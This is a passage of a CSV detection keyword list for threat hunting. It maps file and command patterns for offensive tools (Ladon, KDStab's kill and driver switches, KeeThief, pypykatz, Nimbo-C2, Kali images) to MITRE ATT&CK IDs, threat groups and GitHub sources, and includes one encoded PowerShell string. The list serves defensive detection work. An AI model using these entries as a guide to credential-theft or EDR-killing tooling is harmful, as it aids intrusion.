to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z
-*k8gege.org/*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*k8gege/Ladon*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*K8Ladon.sln*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*KABHAGUAdAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIAAtAE4AYQBtAGUAIABBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAbgBhAG0AZQApACAALQBjAG8AbgB0AGEAaQBuAHMAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQAuAG4AYQBtAGUA*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z
-*kali-*.deb*,offensive_tool_keyword,kali,Kali Linux is an open-source. 
Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*kali-anonsurf*,offensive_tool_keyword,kali-anonsurf,Anonsurf will anonymize the entire system under TOR using IPTables. It will also allow you to start and stop i2p as well.,T1568 - T1102 - T1055 - T1070,TA0002 - TA0008 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/Und3rf10w/kali-anonsurf,1,1,N/A,N/A,10,1268,427,2023-05-18T00:25:57Z,2015-08-19T04:57:16Z
-*KaliLadon.*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z
-*kali-linux*.7z*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*kali-linux*.img*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*kali-linux*.iso*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*kali-linux-*.torrent*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*kali-linux-*.vmdk*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*kali-linux-*.vmwarevm*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*kali-linux-*.vmx*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*kali-linux-*-installer-amd64.iso*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*kali-linux-*-installer-everything-amd64.iso.torrent*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*kali-linux-*-live-everything-amd64.iso.torrent*,offensive_tool_keyword,kali,Kali Linux is an open-source. 
Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*kali-linux-*-raspberry-pi-armhf.img.xz*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*kali-linux-*-virtualbox-amd64.ova*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*kali-linux-*-vmware-amd64.7z*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*kalitorify*,offensive_tool_keyword,kalitorify,kalitorify is a shell script for Kali Linux which use iptables settings to create a Transparent Proxy through the Tor Network. the program also allows you to perform various checks like checking the Tor Exit Node (i.e. your public IP when you are under Tor proxy). 
or if Tor has been configured correctly checking service and network settings.,T1090 - T1132 - T1046 - T1016,TA0003 - TA0011 - TA0040,N/A,N/A,Data Exfiltration,https://github.com/brainfucksec/kalitorify,1,0,N/A,N/A,9,897,214,2022-05-31T08:47:52Z,2016-02-03T20:42:46Z
-*kaluche/bloodhound-quickwin*,offensive_tool_keyword,bloodhound-quickwin,Simple script to extract useful informations from the combo BloodHound + Neo4j,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/kaluche/bloodhound-quickwin,1,1,N/A,6,2,162,17,2023-07-17T14:31:51Z,2021-02-16T16:04:16Z
-*kancotdiq/wpaf*,offensive_tool_keyword,wpaf,WordPress admin finder,T1596,TA0007,N/A,N/A,Web Attacks,https://github.com/kancotdiq/wpaf,1,0,N/A,N/A,1,51,8,2018-07-12T04:55:58Z,2018-07-11T18:09:11Z
-*karendm/ADHunt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z
-*Karmaleon.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z
-*karmaSMB.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-*katoolin*toollist.py*,offensive_tool_keyword,katoolin3,Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.,T1203 - T1090 - T1020,TA0006 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/s-h-3-l-l/katoolin3,1,1,N/A,N/A,4,315,103,2020-08-05T17:21:00Z,2019-09-05T13:14:46Z
-*katoolin3.py*,offensive_tool_keyword,katoolin3,Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.,T1203 - T1090 - T1020,TA0006 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/s-h-3-l-l/katoolin3,1,1,N/A,N/A,4,315,103,2020-08-05T17:21:00Z,2019-09-05T13:14:46Z
-*KatzSystemArchitecture*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z
-*KBDPAYLOAD.dll*,offensive_tool_keyword,cobaltstrike,Achieve execution using a custom keyboard layout,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence,1,1,N/A,10,10,156,30,2023-05-23T20:34:26Z,2022-03-13T17:43:29Z
-*kcdahmgmaagjhocpipbodaokikjkampi*,greyware_tool_keyword,Hola VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*kchocjcihdgkoplngjemhpplmmloanja*,greyware_tool_keyword,IPBurger Proxy & VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*kcndmbbelllkmioekdagahekgimemejo*,greyware_tool_keyword,VPN.AC,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*KcpPassword.cs*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - 
T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z
-*kdcdump2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*kdstab * /CHECK*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z
-*kdstab * /CLOSE*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 
- T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z
-*kdstab * /DRIVER*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z
-*kdstab * 
/KILL*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab * /LIST*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus 
- FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab * /NAME*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab * 